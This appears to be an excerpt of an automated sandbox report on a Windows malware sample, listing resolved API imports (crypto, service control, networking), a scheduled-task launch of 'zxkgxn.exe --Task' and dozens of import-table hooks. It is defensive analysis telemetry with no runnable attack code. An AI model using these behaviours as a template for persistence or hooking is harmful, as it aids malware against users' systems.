Get Address	c:\windows\syswow64\kernel32.dll	function = FormatMessageW, address_out = 0x76c34620	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpynW, address_out = 0x76c5d556	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateProcessA, address_out = 0x76c31072	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadFile, address_out = 0x76c33ed3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileW, address_out = 0x76c33f5c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcatA, address_out = 0x76c52b7a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetEnvironmentVariableA, address_out = 0x76c333a0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpW, address_out = 0x76c35929	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MultiByteToWideChar, address_out = 0x76c3192e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrlenW, address_out = 0x76c31700	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushFileBuffers, address_out = 0x76c3469b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetShortPathNameA, address_out = 0x76c5594d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileSizeEx, address_out = 0x76c359e2	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLastError, address_out = 0x76c311c0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetLastError, address_out = 0x76c311a9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcAddress, address_out = 0x76c31222	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MoveFileW, address_out = 0x76c49af0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindClose, address_out = 0x76c34442	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32FirstW, address_out = 0x76c58baf	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LocalAlloc, address_out = 0x76c3168c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateEventW, address_out = 0x76c3183e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameA, address_out = 0x76c314b1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32NextW, address_out = 0x76c5896c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcatW, address_out = 0x76c5828e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateMutexA, address_out = 0x76c34c6b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FatalAppExitA, address_out = 0x76cb4691	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateToolhelp32Snapshot, address_out = 0x76c5735f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseHandle, address_out = 0x76c31410	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteFileW, address_out = 0x76c389b3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LocalFree, address_out = 0x76c32d3c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpyW, address_out = 0x76c53102	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteFileA, address_out = 0x76c35444	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpyA, address_out = 0x76c52a9d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetPriorityClass, address_out = 0x76c4cf28	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleW, address_out = 0x76c334b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetComputerNameW, address_out = 0x76c3dd0e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetExitCodeProcess, address_out = 0x76c4174d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameW, address_out = 0x76c34950	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalFree, address_out = 0x76c35558	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVersion, address_out = 0x76c34467	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateDirectoryA, address_out = 0x76c5d526	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThread, address_out = 0x76c334d5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsSetValue, address_out = 0x76c314fb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsGetValue, address_out = 0x76c311e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsAlloc, address_out = 0x76c349ad	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetUnhandledExceptionFilter, address_out = 0x76c387c9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = UnhandledExceptionFilter, address_out = 0x76c5772f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeEnvironmentStringsW, address_out = 0x76c351cb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetEnvironmentStringsW, address_out = 0x76c351e3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessId, address_out = 0x76c311f8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = QueryPerformanceCounter, address_out = 0x76c31725	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStartupInfoW, address_out = 0x76c34d40	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteCriticalSection, address_out = 0x771645f5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeZoneInformation, address_out = 0x76c3465a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RaiseException, address_out = 0x76c358a6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStringTypeW, address_out = 0x76c31946	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapSize, address_out = 0x77163002	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryExW, address_out = 0x76c3495d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapAlloc, address_out = 0x7715e026	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLocaleInfoW, address_out = 0x76c33c42	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidLocale, address_out = 0x76c4ce46	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetUserDefaultLCID, address_out = 0x76c33da5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumSystemLocalesW, address_out = 0x76cb425f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDateFormatW, address_out = 0x76c534d7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeFormatW, address_out = 0x76c4f481	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CompareStringW, address_out = 0x76c33bca	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LCMapStringW, address_out = 0x76c317b9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetConsoleCP, address_out = 0x76cd7bff	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetConsoleMode, address_out = 0x76c31328	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapReAlloc, address_out = 0x77171f6e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetStdHandle, address_out = 0x76cb454f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetEndOfFile, address_out = 0x76c4ce2e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStdHandle, address_out = 0x76c351b3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileType, address_out = 0x76c33531	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleExW, address_out = 0x76c34a6f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteConsoleW, address_out = 0x76c57aca	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadConsoleW, address_out = 0x76cd739a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OutputDebugStringW, address_out = 0x76c5d1d4	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetConsoleCtrlHandler, address_out = 0x76c38a09	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RtlUnwind, address_out = 0x76c5d1c3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LeaveCriticalSection, address_out = 0x77152270	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnterCriticalSection, address_out = 0x771522b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = AreFileApisANSI, address_out = 0x76cb40d1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcessHeap, address_out = 0x76c314e9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentThreadId, address_out = 0x76c31450	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentThread, address_out = 0x76c317ec	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCPInfo, address_out = 0x76c35189	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapFree, address_out = 0x76c314c9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetEnvironmentVariableA, address_out = 0x76c3e331	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EncodePointer, address_out = 0x77170fcb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DecodePointer, address_out = 0x77169d35	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemTimeAsFileTime, address_out = 0x76c33509	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcess, address_out = 0x76c31809	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSemaphoreW, address_out = 0x76c4ca5a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetOEMCP, address_out = 0x76c5d1a1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetACP, address_out = 0x76c3179c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidCodePage, address_out = 0x76c34493	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsProcessorFeaturePresent, address_out = 0x76c35235	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindNextFileW, address_out = 0x76c354ee	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsDebuggerPresent, address_out = 0x76c34a5d	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = LoadCursorW, address_out = 0x74f588f7	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = TranslateMessage, address_out = 0x74f57809	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = RegisterClassExW, address_out = 0x74f5b17d	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = ShowWindow, address_out = 0x74f60dfb	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = IsWindow, address_out = 0x74f57136	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CreateWindowExW, address_out = 0x74f58a29	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = UpdateWindow, address_out = 0x74f63559	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DefWindowProcW, address_out = 0x771625dd	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PeekMessageW, address_out = 0x74f605ba	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PostThreadMessageW, address_out = 0x74f58bff	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = MessageBoxW, address_out = 0x74fafd3f	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DispatchMessageW, address_out = 0x74f5787b	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PostQuitMessage, address_out = 0x74f59abb	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DestroyWindow, address_out = 0x74f59a55	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = SendMessageW, address_out = 0x74f59679	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetMessageW, address_out = 0x74f578e2	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptGetHashParam, address_out = 0x74d4df7e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptAcquireContextW, address_out = 0x74d4df14	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenSCManagerW, address_out = 0x74d4ca64	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenServiceW, address_out = 0x74d4ca4c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptReleaseContext, address_out = 0x74d4e124	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetUserNameW, address_out = 0x74d5157a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptHashData, address_out = 0x74d4df36	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegSetValueExW, address_out = 0x74d514d6	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCloseKey, address_out = 0x74d5469d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptDestroyHash, address_out = 0x74d4df66	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = ControlService, address_out = 0x74d67144	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegOpenKeyExW, address_out = 0x74d5468d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptCreateHash, address_out = 0x74d4df4e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptEncrypt, address_out = 0x74d6779b	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptImportKey, address_out = 0x74d4c532	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = QueryServiceStatus, address_out = 0x74d52a86	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegQueryValueExW, address_out = 0x74d546ad	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CloseServiceHandle, address_out = 0x74d5369c	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetPathFromIDListW, address_out = 0x760617bf	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetSpecialFolderLocation, address_out = 0x7605e141	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = CommandLineToArgvW, address_out = 0x75fe9ee8	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteA, address_out = 0x76217078	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteExW, address_out = 0x75ff1e46	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoInitialize, address_out = 0x755fb636	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoInitializeSecurity, address_out = 0x75607259	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoUninitialize, address_out = 0x756286d3	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoCreateInstance, address_out = 0x75629d0b	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 202, address_out = 0x7522fd6b	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 2, address_out = 0x75224642	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 9, address_out = 0x75223eae	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 8, address_out = 0x75223ed5	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 6, address_out = 0x75223e59	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 200, address_out = 0x75223f21	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 12, address_out = 0x75225dee	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 201, address_out = 0x75224af8	1	Fn
Get Address	c:\windows\syswow64\iphlpapi.dll	function = GetAdaptersInfo, address_out = 0x74b59263	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 12, address_out = 0x75bcb131	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 11, address_out = 0x75bc311b	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 52, address_out = 0x75bd7673	1	Fn
Get Address	c:\windows\syswow64\dnsapi.dll	function = DnsQuery_W, address_out = 0x74a9572c	1	Fn
Get Address	c:\windows\syswow64\dnsapi.dll	function = DnsFree, address_out = 0x74a8436b	1	Fn
Get Address	c:\windows\syswow64\crypt32.dll	function = CryptStringToBinaryA, address_out = 0x759e5d77	1	Fn
Get Address	c:\windows\syswow64\msvcr100.dll	function = atexit, address_out = 0x749dc544	1	Fn

System (254)

Operation	Additional Information	Count	Logfile
Get Time	type = System Time, time = 2019-06-30 09:01:23 (UTC)	1	Fn
Get Time	type = Performance Ctr, time = 16619590223	1	Fn
Get Time	type = System Time, time = 2019-06-30 09:01:25 (UTC)	1	Fn
Get Time	type = Performance Ctr, time = 16825331371	1	Fn
Get Info	type = Hardware Information	249	Fn
Get Info	type = Operating System	1	Fn

Environment (2)

Operation	Additional Information	Success	Count	Logfile
Get Environment String	-		2	Fn Data

Process #6: taskeng.exe

Information	Value
ID	#6
File Name	c:\windows\system32\taskeng.exe
Command Line	taskeng.exe {E387FC81-F75C-4FE1-BEB5-A923C4A8692A} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\5p5NrGJn0jS HALPmcxz:Interactive:LUA[1]
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:00:55, Reason: Created Scheduled Job
Unmonitor	End Time: 00:01:08, Reason: Self Terminated
Monitor Duration	00:00:12
Remark	No high level activity detected in monitored regions

OS Process Information

Information	Value
PID	0xb3c
Parent PID	0x36c (Unknown)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x B40 0x B44 0x B48 0x B4C 0x B50 0x B54 0x B58

Process #7: zxkgxn.exe

569

Information	Value
ID	#7
File Name	c:\users\5p5nrgjn0js halpmcxz\appdata\local\23aa8f91-8e4c-4e01-8a6f-bd3657c0ac36\zxkgxn.exe
Command Line	"C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\23aa8f91-8e4c-4e01-8a6f-bd3657c0ac36\zxkgxn.exe" --Task
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:00:55, Reason: Child Process
Unmonitor	End Time: 00:01:07, Reason: Self Terminated
Monitor Duration	00:00:12

OS Process Information

Information	Value
PID	0xb5c
Parent PID	0xb3c (c:\windows\system32\taskeng.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x B60 0x B98 0x B9C 0x BA0 0x BA4 0x BA8 0x BAC

Hook Information

Type	Installer	Target	Size	Information	Actions
IAT	private_0x0000000000620000:+0x5a5cf	1. entry of zxkgxn.exe	4 bytes	ntdll.dll:RtlReAllocateHeap+0x0 now points to private_0x000000007fff0000:+0x6a00fffb	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	5. entry of zxkgxn.exe	4 bytes	kernel32.dll:WaitForSingleObject+0x0 now points to private_0x000000007fff0000:+0x4784078b	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	6. entry of zxkgxn.exe	4 bytes	kernel32.dll:SetTapeParameters+0x0 now points to private_0x000000007fff0000:+0x68868904	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	7. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetModuleHandleW+0x0 now points to private_0x000000007fff0000:+0x600fffb	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	8. entry of zxkgxn.exe	4 bytes	kernel32.dll:ExpandEnvironmentStringsA+0x0 now points to private_0x000000007fff0000:+0x78868bc0	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	9. entry of zxkgxn.exe	4 bytes	kernel32.dll:WaitNamedPipeW+0x0 now points to private_0x000000007fff0000:+0xa00fffb	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	10. entry of zxkgxn.exe	4 bytes	kernel32.dll:EnumTimeFormatsA+0x0 now points to private_0x000000007fff0000:+0x7ffcf0bd	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	11. entry of zxkgxn.exe	4 bytes	kernel32.dll:LoadLibraryW+0x0 now points to private_0x000000007fff0000:+0x7c8a0fff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	12. entry of zxkgxn.exe	4 bytes	kernel32.dll:Sleep+0x0 now points to private_0x000000007fff0000:+0x3010008	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	13. entry of zxkgxn.exe	4 bytes	kernel32.dll:FormatMessageW+0x0 now points to private_0x000000007fff0000:+0x7ffce88d	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	14. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetStringTypeExW+0x0 now points to private_0x000000007fff0000:+0x70eaffff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	16. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetSystemDirectoryA+0x0 now points to private_0x000000007fff0000:+0x7ffce88d	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	17. entry of zxkgxn.exe	4 bytes	kernel32.dll:CreateMailslotW+0x0 now points to private_0x000000007fff0000:+0x37100aff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	18. entry of zxkgxn.exe	4 bytes	kernel32.dll:WritePrivateProfileStringW+0x0 now points to private_0x000000007fff0000:+0x50c283c2	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	19. entry of zxkgxn.exe	4 bytes	kernel32.dll:ReplaceFileA+0x0 now points to private_0x000000007fff0000:+0x58ac103	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	20. entry of zxkgxn.exe	4 bytes	kernel32.dll:EnumSystemLocalesA+0x0 now points to private_0x000000007fff0000:+0x8000fbe8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	21. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetProfileIntA+0x0 now points to private_0x0000000000050000:+0x3cae9	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	22. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetLastError+0x0 now points to private_0x000000007fff0000:+0x42b80f00	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	28. entry of zxkgxn.exe	4 bytes	kernel32.dll:FindFirstVolumeMountPointW+0x0 now points to private_0x000000007fff0000:+0x7bf9858b	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	29. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetProfileStringA+0x0 now points to private_0x000000007fff0000:+0x510ffff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	32. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetDefaultCommConfigA+0x0 now points to private_0x000000007fff0000:+0x7cea0000	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	33. entry of zxkgxn.exe	4 bytes	kernel32.dll:VirtualProtect+0x0 now points to private_0x000000007fff0000:+0xc00fffe	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	34. entry of zxkgxn.exe	4 bytes	ntdll.dll:RtlDeleteCriticalSection+0x0 now points to private_0x000000007fff0000:+0x7ffcf885	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	36. entry of zxkgxn.exe	4 bytes	kernel32.dll:MoveFileWithProgressW+0x0 now points to private_0x000000007fff0000:+0x40841475	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	37. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetConsoleProcessList+0x0 now points to pagefile_0x0000000000aa0000:+0x218102	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	38. entry of zxkgxn.exe	4 bytes	kernel32.dll:WriteConsoleW+0x0 now points to private_0x000000007fff0000:+0x9010010	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	39. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetStringTypeW+0x0 now points to private_0x000000007fff0000:+0x7ffcf885	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	40. entry of zxkgxn.exe	4 bytes	kernel32.dll:ReadConsoleW+0x0 now points to private_0x000000007fff0000:+0x7edee9ff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	41. entry of zxkgxn.exe	4 bytes	kernel32.dll:ReadFile+0x0 now points to private_0x000000007fff0000:+0x4b84ffff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	42. entry of zxkgxn.exe	4 bytes	kernel32.dll:OutputDebugStringW+0x0 now points to private_0x000000007fff0000:+0x7ed6e910	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	44. entry of zxkgxn.exe	4 bytes	kernel32.dll:SetStdHandle+0x0 now points to private_0x000000007fff0000:+0x69d90b58	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	45. entry of zxkgxn.exe	4 bytes	kernel32.dll:EnumSystemLocalesW+0x0 now points to private_0x000000007fff0000:+0x8000fed9	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	46. entry of zxkgxn.exe	4 bytes	kernel32.dll:HeapFree+0x0 now points to private_0x000000007fff0000:+0x7bf9858b	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	47. entry of zxkgxn.exe	4 bytes	ntdll.dll:RtlEncodePointer+0x0 now points to private_0x000000007fff0000:+0x3710ffff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	49. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetCommandLineA+0x0 now points to private_0x000000007fff0000:+0x3d8c2375	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	50. entry of zxkgxn.exe	4 bytes	kernel32.dll:RaiseException+0x0 now points to private_0x000000007fff0000:+0x8000fbf8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	52. entry of zxkgxn.exe	4 bytes	kernel32.dll:IsDebuggerPresent+0x0 now points to private_0x000000007fff0000:+0xb177534	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	54. entry of zxkgxn.exe	4 bytes	ntdll.dll:RtlEnterCriticalSection+0x0 now points to private_0x000000007fff0000:+0x1cb81	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	55. entry of zxkgxn.exe	4 bytes	ntdll.dll:RtlLeaveCriticalSection+0x0 now points to private_0x000000007fff0000:+0x58a0000	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	56. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetStdHandle+0x0 now points to private_0x000000007fff0000:+0x8000fbf8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	57. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetFileType+0x0 now points to private_0x000000007fff0000:+0x7fff9ae9	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	59. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetProcessHeap+0x0 now points to private_0x000000007fff0000:+0x3d8c2375	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	60. entry of zxkgxn.exe	4 bytes	ntdll.dll:RtlAllocateHeap+0x0 now points to private_0x000000007fff0000:+0x8000fbf8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	62. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetModuleHandleExW+0x0 now points to private_0x000000007fff0000:+0xb177532	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	64. entry of zxkgxn.exe	4 bytes	kernel32.dll:AreFileApisANSI+0x0 now points to private_0x000000007fff0000:+0xe381	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	65. entry of zxkgxn.exe	4 bytes	kernel32.dll:MultiByteToWideChar+0x0 now points to private_0x000000007fff0000:+0x58affff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5cf	66. entry of zxkgxn.exe	4 bytes	kernel32.dll:WideCharToMultiByte+0x0 now points to private_0x000000007fff0000:+0x8000fbf8	... Actions Go to Installer Region Go to Target Region
